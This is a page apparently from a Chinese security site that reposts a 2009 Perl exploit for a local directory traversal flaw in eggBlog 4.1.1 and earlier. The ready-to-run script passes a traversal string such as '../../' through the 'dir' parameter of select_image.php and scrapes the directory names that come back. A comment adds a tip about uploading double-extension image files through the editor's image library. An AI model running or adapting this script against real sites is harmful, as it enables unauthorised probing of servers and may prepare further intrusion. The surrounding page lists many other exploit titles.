首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
eggBlog <= 4.1.1 Local Directory Transversal Exploit
来源:staker[at]hotmail[dot]it 作者:staker 发布时间:2009-05-12  
#!/usr/bin/perl
#
# eggBlog <= 4.1.1 Local Directory Transversal Exploit
#
# by Juri Gianni aka yeat - staker[at]hotmail[dot]it
# Visit http://zeroidentity.org
#
# Description
# ----------------------------------------------------
# eggBlog contains one flaw that allows an attacker to
# carry out a local directory transversal attack.
# The issue is due to 'select_image.php' script not
# properly sanitizing user input supplied to the 'dir'
# GET variable.
# -----------------------------------------------------
# Note: you may upload image files with double ext on
# _lib/openwysiwyg/addons/imagelibrary/insert_image.php
# -----------------------------------------------------

use LWP::UserAgent;


my $domain = $ARGV[0];
my $folder = $ARGV[1] || &usage;

exploit($folder);


sub usage()
{
      print "eggBlog <= 4.1.1 Local Directory Transversal Exploit\n";
      print "Usage: perl xpl.pl localhost/eggBlog ../../\n";
      print "Visit http://zeroidentity.org\n";
      exit;
}     


sub exploit()
{
      my $param = shift @_ || die "1 parameter required\n";
      
      my $response = undef;
      my @director = undef;
     
      my $lib = new LWP::UserAgent;
     
      $lib->agent('Lynx (textmode)');
      $lib->timeout(5);
     
      $response = $lib->get("http://$domain/_lib/openwysiwyg/addons/imagelibrary/select_image.php?dir=$param");
     
      @director = $response->content =~ /<strong>(.+?)<\/strong>/ig;
     
      for (my $i=0;$i<=scalar(@director);$i++) {
         print $director[$i]."\n";
      }  
}     
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mereo 1.8.0 Arbitrary File Dis
·microTopic v1 (rating) Remote
·TYPSoft FTP Server 1.11 (ABORT
·MPLAB IDE 8.30 (.mcp) Universa
·TinyWebGallery <= 1.7.6 LFI /
·Personal FTP Server versions u
·RTWebalbum 1.0.462 (AlbumID) B
·Exploits BLIND SQL INJECTION (
·Mortbay Jetty <= 7.0.0-pre5 Di
·TinyWebGallery <= 1.7.6 LFI /
·Luxbum 0.5.5/stable (Auth Bypa
·Bitweaver <= 2.6 saveFeed() Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved